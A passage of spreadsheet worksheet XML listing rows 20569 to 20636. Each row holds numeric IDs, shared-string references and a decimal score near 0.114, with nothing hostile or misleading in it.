      <c r="C20569" s="2" t="s">
        <v>19844</v>
      </c>
      <c r="D20569" s="2">
        <v>1.0</v>
      </c>
      <c r="E20569" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20569" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="20570" ht="15.75" customHeight="1">
      <c r="A20570" s="1">
        <v>2364.0</v>
      </c>
      <c r="B20570" s="2">
        <v>3.3236375E7</v>
      </c>
      <c r="C20570" s="2" t="s">
        <v>19845</v>
      </c>
      <c r="D20570" s="2">
        <v>1.0</v>
      </c>
      <c r="E20570" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20570" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="20571" ht="15.75" customHeight="1">
      <c r="A20571" s="1">
        <v>6541.0</v>
      </c>
      <c r="B20571" s="2">
        <v>4.8854031E7</v>
      </c>
      <c r="C20571" s="2" t="s">
        <v>19846</v>
      </c>
      <c r="D20571" s="2">
        <v>1.0</v>
      </c>
      <c r="E20571" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20571" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="20572" ht="15.75" customHeight="1">
      <c r="A20572" s="1">
        <v>17006.0</v>
      </c>
      <c r="B20572" s="2">
        <v>4.8423167E7</v>
      </c>
      <c r="C20572" s="2" t="s">
        <v>19847</v>
      </c>
      <c r="D20572" s="2">
        <v>1.0</v>
      </c>
      <c r="E20572" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20572" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="20573" ht="15.75" customHeight="1">
      <c r="A20573" s="1">
        <v>18561.0</v>
      </c>
      <c r="B20573" s="2">
        <v>5.3177373E7</v>
      </c>
      <c r="C20573" s="2" t="s">
        <v>19848</v>
      </c>
      <c r="D20573" s="2">
        <v>1.0</v>
      </c>
      <c r="E20573" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20573" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="20574" ht="15.75" customHeight="1">
      <c r="A20574" s="1">
        <v>3964.0</v>
      </c>
      <c r="B20574" s="2">
        <v>4.0722435E7</v>
      </c>
      <c r="C20574" s="2" t="s">
        <v>19849</v>
      </c>
      <c r="D20574" s="2">
        <v>1.0</v>
      </c>
      <c r="E20574" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20574" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="20575" ht="15.75" customHeight="1">
      <c r="A20575" s="1">
        <v>5178.0</v>
      </c>
      <c r="B20575" s="2">
        <v>4.47607E7</v>
      </c>
      <c r="C20575" s="2" t="s">
        <v>19850</v>
      </c>
      <c r="D20575" s="2">
        <v>1.0</v>
      </c>
      <c r="E20575" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20575" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="20576" ht="15.75" customHeight="1">
      <c r="A20576" s="1">
        <v>10064.0</v>
      </c>
      <c r="B20576" s="2">
        <v>5.7128386E7</v>
      </c>
      <c r="C20576" s="2" t="s">
        <v>19851</v>
      </c>
      <c r="D20576" s="2">
        <v>1.0</v>
      </c>
      <c r="E20576" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20576" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="20577" ht="15.75" customHeight="1">
      <c r="A20577" s="1">
        <v>11337.0</v>
      </c>
      <c r="B20577" s="2">
        <v>2.1195935E7</v>
      </c>
      <c r="C20577" s="2" t="s">
        <v>19852</v>
      </c>
      <c r="D20577" s="2">
        <v>1.0</v>
      </c>
      <c r="E20577" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20577" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="20578" ht="15.75" customHeight="1">
      <c r="A20578" s="1">
        <v>14361.0</v>
      </c>
      <c r="B20578" s="2">
        <v>3.8951158E7</v>
      </c>
      <c r="C20578" s="2" t="s">
        <v>19853</v>
      </c>
      <c r="D20578" s="2">
        <v>1.0</v>
      </c>
      <c r="E20578" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20578" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="20579" ht="15.75" customHeight="1">
      <c r="A20579" s="1">
        <v>14496.0</v>
      </c>
      <c r="B20579" s="2">
        <v>3.9642311E7</v>
      </c>
      <c r="C20579" s="2" t="s">
        <v>19854</v>
      </c>
      <c r="D20579" s="2">
        <v>1.0</v>
      </c>
      <c r="E20579" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20579" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="20580" ht="15.75" customHeight="1">
      <c r="A20580" s="1">
        <v>15180.0</v>
      </c>
      <c r="B20580" s="2">
        <v>4.2022481E7</v>
      </c>
      <c r="C20580" s="2" t="s">
        <v>19855</v>
      </c>
      <c r="D20580" s="2">
        <v>1.0</v>
      </c>
      <c r="E20580" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20580" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="20581" ht="15.75" customHeight="1">
      <c r="A20581" s="1">
        <v>15692.0</v>
      </c>
      <c r="B20581" s="2">
        <v>4.3883697E7</v>
      </c>
      <c r="C20581" s="2" t="s">
        <v>19856</v>
      </c>
      <c r="D20581" s="2">
        <v>1.0</v>
      </c>
      <c r="E20581" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20581" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="20582" ht="15.75" customHeight="1">
      <c r="A20582" s="1">
        <v>15754.0</v>
      </c>
      <c r="B20582" s="2">
        <v>4.4140761E7</v>
      </c>
      <c r="C20582" s="2" t="s">
        <v>19857</v>
      </c>
      <c r="D20582" s="2">
        <v>1.0</v>
      </c>
      <c r="E20582" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20582" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="20583" ht="15.75" customHeight="1">
      <c r="A20583" s="1">
        <v>22404.0</v>
      </c>
      <c r="B20583" s="2">
        <v>3.5718306E7</v>
      </c>
      <c r="C20583" s="2" t="s">
        <v>19858</v>
      </c>
      <c r="D20583" s="2">
        <v>1.0</v>
      </c>
      <c r="E20583" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20583" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="20584" ht="15.75" customHeight="1">
      <c r="A20584" s="1">
        <v>26828.0</v>
      </c>
      <c r="B20584" s="2">
        <v>1.887027E7</v>
      </c>
      <c r="C20584" s="2" t="s">
        <v>19859</v>
      </c>
      <c r="D20584" s="2">
        <v>1.0</v>
      </c>
      <c r="E20584" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20584" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="20585" ht="15.75" customHeight="1">
      <c r="A20585" s="1">
        <v>15635.0</v>
      </c>
      <c r="B20585" s="2">
        <v>4.3579749E7</v>
      </c>
      <c r="C20585" s="2" t="s">
        <v>19860</v>
      </c>
      <c r="D20585" s="2">
        <v>1.0</v>
      </c>
      <c r="E20585" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20585" s="2">
        <v>0.1155202821869488</v>
      </c>
    </row>
    <row r="20586" ht="15.75" customHeight="1">
      <c r="A20586" s="1">
        <v>1807.0</v>
      </c>
      <c r="B20586" s="2">
        <v>2.9188092E7</v>
      </c>
      <c r="C20586" s="2" t="s">
        <v>19861</v>
      </c>
      <c r="D20586" s="2">
        <v>1.0</v>
      </c>
      <c r="E20586" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20586" s="2">
        <v>0.1153846153846154</v>
      </c>
    </row>
    <row r="20587" ht="15.75" customHeight="1">
      <c r="A20587" s="1">
        <v>2985.0</v>
      </c>
      <c r="B20587" s="2">
        <v>3.6187949E7</v>
      </c>
      <c r="C20587" s="2" t="s">
        <v>19862</v>
      </c>
      <c r="D20587" s="2">
        <v>1.0</v>
      </c>
      <c r="E20587" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20587" s="2">
        <v>0.115257048092869</v>
      </c>
    </row>
    <row r="20588" ht="15.75" customHeight="1">
      <c r="A20588" s="1">
        <v>17950.0</v>
      </c>
      <c r="B20588" s="2">
        <v>5.1255502E7</v>
      </c>
      <c r="C20588" s="2" t="s">
        <v>19863</v>
      </c>
      <c r="D20588" s="2">
        <v>1.0</v>
      </c>
      <c r="E20588" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20588" s="2">
        <v>0.1151960784313726</v>
      </c>
    </row>
    <row r="20589" ht="15.75" customHeight="1">
      <c r="A20589" s="1">
        <v>19619.0</v>
      </c>
      <c r="B20589" s="2">
        <v>5.6235444E7</v>
      </c>
      <c r="C20589" s="2" t="s">
        <v>19864</v>
      </c>
      <c r="D20589" s="2">
        <v>1.0</v>
      </c>
      <c r="E20589" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20589" s="2">
        <v>0.1151368760064412</v>
      </c>
    </row>
    <row r="20590" ht="15.75" customHeight="1">
      <c r="A20590" s="1">
        <v>25248.0</v>
      </c>
      <c r="B20590" s="2">
        <v>1.3382049E7</v>
      </c>
      <c r="C20590" s="2" t="s">
        <v>19865</v>
      </c>
      <c r="D20590" s="2">
        <v>1.0</v>
      </c>
      <c r="E20590" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20590" s="2">
        <v>0.1150793650793651</v>
      </c>
    </row>
    <row r="20591" ht="15.75" customHeight="1">
      <c r="A20591" s="1">
        <v>5024.0</v>
      </c>
      <c r="B20591" s="2">
        <v>4.423658E7</v>
      </c>
      <c r="C20591" s="2" t="s">
        <v>19866</v>
      </c>
      <c r="D20591" s="2">
        <v>1.0</v>
      </c>
      <c r="E20591" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20591" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="20592" ht="15.75" customHeight="1">
      <c r="A20592" s="1">
        <v>6252.0</v>
      </c>
      <c r="B20592" s="2">
        <v>4.8105197E7</v>
      </c>
      <c r="C20592" s="2" t="s">
        <v>19867</v>
      </c>
      <c r="D20592" s="2">
        <v>1.0</v>
      </c>
      <c r="E20592" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20592" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="20593" ht="15.75" customHeight="1">
      <c r="A20593" s="1">
        <v>6674.0</v>
      </c>
      <c r="B20593" s="2">
        <v>4.9156591E7</v>
      </c>
      <c r="C20593" s="2" t="s">
        <v>19868</v>
      </c>
      <c r="D20593" s="2">
        <v>1.0</v>
      </c>
      <c r="E20593" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20593" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="20594" ht="15.75" customHeight="1">
      <c r="A20594" s="1">
        <v>27080.0</v>
      </c>
      <c r="B20594" s="2">
        <v>2.0483762E7</v>
      </c>
      <c r="C20594" s="2" t="s">
        <v>19869</v>
      </c>
      <c r="D20594" s="2">
        <v>1.0</v>
      </c>
      <c r="E20594" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20594" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="20595" ht="15.75" customHeight="1">
      <c r="A20595" s="1">
        <v>30.0</v>
      </c>
      <c r="B20595" s="2">
        <v>1.0523683E7</v>
      </c>
      <c r="C20595" s="2" t="s">
        <v>19870</v>
      </c>
      <c r="D20595" s="2">
        <v>1.0</v>
      </c>
      <c r="E20595" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20595" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20596" ht="15.75" customHeight="1">
      <c r="A20596" s="1">
        <v>622.0</v>
      </c>
      <c r="B20596" s="2">
        <v>1.9551615E7</v>
      </c>
      <c r="C20596" s="2" t="s">
        <v>19871</v>
      </c>
      <c r="D20596" s="2">
        <v>1.0</v>
      </c>
      <c r="E20596" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20596" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20597" ht="15.75" customHeight="1">
      <c r="A20597" s="1">
        <v>1913.0</v>
      </c>
      <c r="B20597" s="2">
        <v>3.0025553E7</v>
      </c>
      <c r="C20597" s="2" t="s">
        <v>19872</v>
      </c>
      <c r="D20597" s="2">
        <v>1.0</v>
      </c>
      <c r="E20597" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20597" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20598" ht="15.75" customHeight="1">
      <c r="A20598" s="1">
        <v>2007.0</v>
      </c>
      <c r="B20598" s="2">
        <v>3.0666783E7</v>
      </c>
      <c r="C20598" s="2" t="s">
        <v>19873</v>
      </c>
      <c r="D20598" s="2">
        <v>1.0</v>
      </c>
      <c r="E20598" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20598" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20599" ht="15.75" customHeight="1">
      <c r="A20599" s="1">
        <v>2090.0</v>
      </c>
      <c r="B20599" s="2">
        <v>3.1259876E7</v>
      </c>
      <c r="C20599" s="2" t="s">
        <v>19874</v>
      </c>
      <c r="D20599" s="2">
        <v>1.0</v>
      </c>
      <c r="E20599" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20599" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20600" ht="15.75" customHeight="1">
      <c r="A20600" s="1">
        <v>2493.0</v>
      </c>
      <c r="B20600" s="2">
        <v>3.3892704E7</v>
      </c>
      <c r="C20600" s="2" t="s">
        <v>19875</v>
      </c>
      <c r="D20600" s="2">
        <v>1.0</v>
      </c>
      <c r="E20600" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20600" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20601" ht="15.75" customHeight="1">
      <c r="A20601" s="1">
        <v>2897.0</v>
      </c>
      <c r="B20601" s="2">
        <v>3.572799E7</v>
      </c>
      <c r="C20601" s="2" t="s">
        <v>19876</v>
      </c>
      <c r="D20601" s="2">
        <v>1.0</v>
      </c>
      <c r="E20601" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20601" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20602" ht="15.75" customHeight="1">
      <c r="A20602" s="1">
        <v>3575.0</v>
      </c>
      <c r="B20602" s="2">
        <v>3.8966742E7</v>
      </c>
      <c r="C20602" s="2" t="s">
        <v>19877</v>
      </c>
      <c r="D20602" s="2">
        <v>1.0</v>
      </c>
      <c r="E20602" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20602" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20603" ht="15.75" customHeight="1">
      <c r="A20603" s="1">
        <v>3819.0</v>
      </c>
      <c r="B20603" s="2">
        <v>4.0104559E7</v>
      </c>
      <c r="C20603" s="2" t="s">
        <v>19878</v>
      </c>
      <c r="D20603" s="2">
        <v>1.0</v>
      </c>
      <c r="E20603" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20603" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20604" ht="15.75" customHeight="1">
      <c r="A20604" s="1">
        <v>9304.0</v>
      </c>
      <c r="B20604" s="2">
        <v>5.5561129E7</v>
      </c>
      <c r="C20604" s="2" t="s">
        <v>19879</v>
      </c>
      <c r="D20604" s="2">
        <v>1.0</v>
      </c>
      <c r="E20604" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20604" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20605" ht="15.75" customHeight="1">
      <c r="A20605" s="1">
        <v>10353.0</v>
      </c>
      <c r="B20605" s="2">
        <v>7092105.0</v>
      </c>
      <c r="C20605" s="2" t="s">
        <v>19880</v>
      </c>
      <c r="D20605" s="2">
        <v>1.0</v>
      </c>
      <c r="E20605" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20605" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20606" ht="15.75" customHeight="1">
      <c r="A20606" s="1">
        <v>13064.0</v>
      </c>
      <c r="B20606" s="2">
        <v>3.3313844E7</v>
      </c>
      <c r="C20606" s="2" t="s">
        <v>19881</v>
      </c>
      <c r="D20606" s="2">
        <v>1.0</v>
      </c>
      <c r="E20606" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20606" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20607" ht="15.75" customHeight="1">
      <c r="A20607" s="1">
        <v>17637.0</v>
      </c>
      <c r="B20607" s="2">
        <v>5.0389556E7</v>
      </c>
      <c r="C20607" s="2" t="s">
        <v>19882</v>
      </c>
      <c r="D20607" s="2">
        <v>1.0</v>
      </c>
      <c r="E20607" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20607" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20608" ht="15.75" customHeight="1">
      <c r="A20608" s="1">
        <v>17721.0</v>
      </c>
      <c r="B20608" s="2">
        <v>5.0627166E7</v>
      </c>
      <c r="C20608" s="2" t="s">
        <v>19883</v>
      </c>
      <c r="D20608" s="2">
        <v>1.0</v>
      </c>
      <c r="E20608" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20608" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20609" ht="15.75" customHeight="1">
      <c r="A20609" s="1">
        <v>17984.0</v>
      </c>
      <c r="B20609" s="2">
        <v>5.1381785E7</v>
      </c>
      <c r="C20609" s="2" t="s">
        <v>19884</v>
      </c>
      <c r="D20609" s="2">
        <v>1.0</v>
      </c>
      <c r="E20609" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20609" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20610" ht="15.75" customHeight="1">
      <c r="A20610" s="1">
        <v>18236.0</v>
      </c>
      <c r="B20610" s="2">
        <v>5.2117416E7</v>
      </c>
      <c r="C20610" s="2" t="s">
        <v>19885</v>
      </c>
      <c r="D20610" s="2">
        <v>1.0</v>
      </c>
      <c r="E20610" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20610" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20611" ht="15.75" customHeight="1">
      <c r="A20611" s="1">
        <v>18523.0</v>
      </c>
      <c r="B20611" s="2">
        <v>5.302192E7</v>
      </c>
      <c r="C20611" s="2" t="s">
        <v>19886</v>
      </c>
      <c r="D20611" s="2">
        <v>1.0</v>
      </c>
      <c r="E20611" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20611" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20612" ht="15.75" customHeight="1">
      <c r="A20612" s="1">
        <v>18604.0</v>
      </c>
      <c r="B20612" s="2">
        <v>5.3281503E7</v>
      </c>
      <c r="C20612" s="2" t="s">
        <v>19887</v>
      </c>
      <c r="D20612" s="2">
        <v>1.0</v>
      </c>
      <c r="E20612" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20612" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20613" ht="15.75" customHeight="1">
      <c r="A20613" s="1">
        <v>22800.0</v>
      </c>
      <c r="B20613" s="2">
        <v>4.5716328E7</v>
      </c>
      <c r="C20613" s="2" t="s">
        <v>19888</v>
      </c>
      <c r="D20613" s="2">
        <v>1.0</v>
      </c>
      <c r="E20613" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20613" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="20614" ht="15.75" customHeight="1">
      <c r="A20614" s="1">
        <v>56.0</v>
      </c>
      <c r="B20614" s="2">
        <v>1.1028534E7</v>
      </c>
      <c r="C20614" s="2" t="s">
        <v>19889</v>
      </c>
      <c r="D20614" s="2">
        <v>1.0</v>
      </c>
      <c r="E20614" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20614" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20615" ht="15.75" customHeight="1">
      <c r="A20615" s="1">
        <v>253.0</v>
      </c>
      <c r="B20615" s="2">
        <v>1.5039334E7</v>
      </c>
      <c r="C20615" s="2" t="s">
        <v>19890</v>
      </c>
      <c r="D20615" s="2">
        <v>1.0</v>
      </c>
      <c r="E20615" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20615" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20616" ht="15.75" customHeight="1">
      <c r="A20616" s="1">
        <v>602.0</v>
      </c>
      <c r="B20616" s="2">
        <v>1.9322432E7</v>
      </c>
      <c r="C20616" s="2" t="s">
        <v>19891</v>
      </c>
      <c r="D20616" s="2">
        <v>1.0</v>
      </c>
      <c r="E20616" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20616" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20617" ht="15.75" customHeight="1">
      <c r="A20617" s="1">
        <v>997.0</v>
      </c>
      <c r="B20617" s="2">
        <v>2.2931425E7</v>
      </c>
      <c r="C20617" s="2" t="s">
        <v>19892</v>
      </c>
      <c r="D20617" s="2">
        <v>1.0</v>
      </c>
      <c r="E20617" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20617" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20618" ht="15.75" customHeight="1">
      <c r="A20618" s="1">
        <v>1077.0</v>
      </c>
      <c r="B20618" s="2">
        <v>2.360847E7</v>
      </c>
      <c r="C20618" s="2" t="s">
        <v>19893</v>
      </c>
      <c r="D20618" s="2">
        <v>1.0</v>
      </c>
      <c r="E20618" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20618" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20619" ht="15.75" customHeight="1">
      <c r="A20619" s="1">
        <v>1150.0</v>
      </c>
      <c r="B20619" s="2">
        <v>2.440079E7</v>
      </c>
      <c r="C20619" s="2" t="s">
        <v>19894</v>
      </c>
      <c r="D20619" s="2">
        <v>1.0</v>
      </c>
      <c r="E20619" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20619" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20620" ht="15.75" customHeight="1">
      <c r="A20620" s="1">
        <v>1231.0</v>
      </c>
      <c r="B20620" s="2">
        <v>2.5014749E7</v>
      </c>
      <c r="C20620" s="2" t="s">
        <v>19895</v>
      </c>
      <c r="D20620" s="2">
        <v>1.0</v>
      </c>
      <c r="E20620" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20620" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20621" ht="15.75" customHeight="1">
      <c r="A20621" s="1">
        <v>1524.0</v>
      </c>
      <c r="B20621" s="2">
        <v>2.7419344E7</v>
      </c>
      <c r="C20621" s="2" t="s">
        <v>19896</v>
      </c>
      <c r="D20621" s="2">
        <v>1.0</v>
      </c>
      <c r="E20621" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20621" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20622" ht="15.75" customHeight="1">
      <c r="A20622" s="1">
        <v>1525.0</v>
      </c>
      <c r="B20622" s="2">
        <v>2.7419344E7</v>
      </c>
      <c r="C20622" s="2" t="s">
        <v>19896</v>
      </c>
      <c r="D20622" s="2">
        <v>1.0</v>
      </c>
      <c r="E20622" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20622" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20623" ht="15.75" customHeight="1">
      <c r="A20623" s="1">
        <v>1594.0</v>
      </c>
      <c r="B20623" s="2">
        <v>2.7756003E7</v>
      </c>
      <c r="C20623" s="2" t="s">
        <v>19897</v>
      </c>
      <c r="D20623" s="2">
        <v>1.0</v>
      </c>
      <c r="E20623" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20623" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20624" ht="15.75" customHeight="1">
      <c r="A20624" s="1">
        <v>1648.0</v>
      </c>
      <c r="B20624" s="2">
        <v>2.8099291E7</v>
      </c>
      <c r="C20624" s="2" t="s">
        <v>19898</v>
      </c>
      <c r="D20624" s="2">
        <v>1.0</v>
      </c>
      <c r="E20624" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20624" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20625" ht="15.75" customHeight="1">
      <c r="A20625" s="1">
        <v>1780.0</v>
      </c>
      <c r="B20625" s="2">
        <v>2.9046165E7</v>
      </c>
      <c r="C20625" s="2" t="s">
        <v>19899</v>
      </c>
      <c r="D20625" s="2">
        <v>1.0</v>
      </c>
      <c r="E20625" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20625" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20626" ht="15.75" customHeight="1">
      <c r="A20626" s="1">
        <v>1836.0</v>
      </c>
      <c r="B20626" s="2">
        <v>2.9364161E7</v>
      </c>
      <c r="C20626" s="5" t="s">
        <v>19900</v>
      </c>
      <c r="D20626" s="2">
        <v>1.0</v>
      </c>
      <c r="E20626" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20626" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20627" ht="15.75" customHeight="1">
      <c r="A20627" s="1">
        <v>1923.0</v>
      </c>
      <c r="B20627" s="2">
        <v>3.0088818E7</v>
      </c>
      <c r="C20627" s="2" t="s">
        <v>19901</v>
      </c>
      <c r="D20627" s="2">
        <v>1.0</v>
      </c>
      <c r="E20627" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20627" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20628" ht="15.75" customHeight="1">
      <c r="A20628" s="1">
        <v>2124.0</v>
      </c>
      <c r="B20628" s="2">
        <v>3.1392499E7</v>
      </c>
      <c r="C20628" s="2" t="s">
        <v>19902</v>
      </c>
      <c r="D20628" s="2">
        <v>1.0</v>
      </c>
      <c r="E20628" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20628" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20629" ht="15.75" customHeight="1">
      <c r="A20629" s="1">
        <v>2191.0</v>
      </c>
      <c r="B20629" s="2">
        <v>3.1930634E7</v>
      </c>
      <c r="C20629" s="2" t="s">
        <v>19903</v>
      </c>
      <c r="D20629" s="2">
        <v>1.0</v>
      </c>
      <c r="E20629" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20629" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20630" ht="15.75" customHeight="1">
      <c r="A20630" s="1">
        <v>2235.0</v>
      </c>
      <c r="B20630" s="2">
        <v>3.2280056E7</v>
      </c>
      <c r="C20630" s="2" t="s">
        <v>19904</v>
      </c>
      <c r="D20630" s="2">
        <v>1.0</v>
      </c>
      <c r="E20630" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20630" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20631" ht="15.75" customHeight="1">
      <c r="A20631" s="1">
        <v>2371.0</v>
      </c>
      <c r="B20631" s="2">
        <v>3.3243756E7</v>
      </c>
      <c r="C20631" s="2" t="s">
        <v>19905</v>
      </c>
      <c r="D20631" s="2">
        <v>1.0</v>
      </c>
      <c r="E20631" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20631" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20632" ht="15.75" customHeight="1">
      <c r="A20632" s="1">
        <v>2385.0</v>
      </c>
      <c r="B20632" s="2">
        <v>3.3329322E7</v>
      </c>
      <c r="C20632" s="2" t="s">
        <v>19906</v>
      </c>
      <c r="D20632" s="2">
        <v>1.0</v>
      </c>
      <c r="E20632" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20632" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20633" ht="15.75" customHeight="1">
      <c r="A20633" s="1">
        <v>2880.0</v>
      </c>
      <c r="B20633" s="2">
        <v>3.5667808E7</v>
      </c>
      <c r="C20633" s="2" t="s">
        <v>19907</v>
      </c>
      <c r="D20633" s="2">
        <v>1.0</v>
      </c>
      <c r="E20633" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20633" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20634" ht="15.75" customHeight="1">
      <c r="A20634" s="1">
        <v>3243.0</v>
      </c>
      <c r="B20634" s="2">
        <v>3.7374869E7</v>
      </c>
      <c r="C20634" s="2" t="s">
        <v>19908</v>
      </c>
      <c r="D20634" s="2">
        <v>1.0</v>
      </c>
      <c r="E20634" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20634" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20635" ht="15.75" customHeight="1">
      <c r="A20635" s="1">
        <v>3561.0</v>
      </c>
      <c r="B20635" s="2">
        <v>3.8859353E7</v>
      </c>
      <c r="C20635" s="2" t="s">
        <v>19909</v>
      </c>
      <c r="D20635" s="2">
        <v>1.0</v>
      </c>
      <c r="E20635" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20635" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20636" ht="15.75" customHeight="1">
      <c r="A20636" s="1">
        <v>3586.0</v>
      </c>
      <c r="B20636" s="2">
        <v>3.9025699E7</v>
      </c>
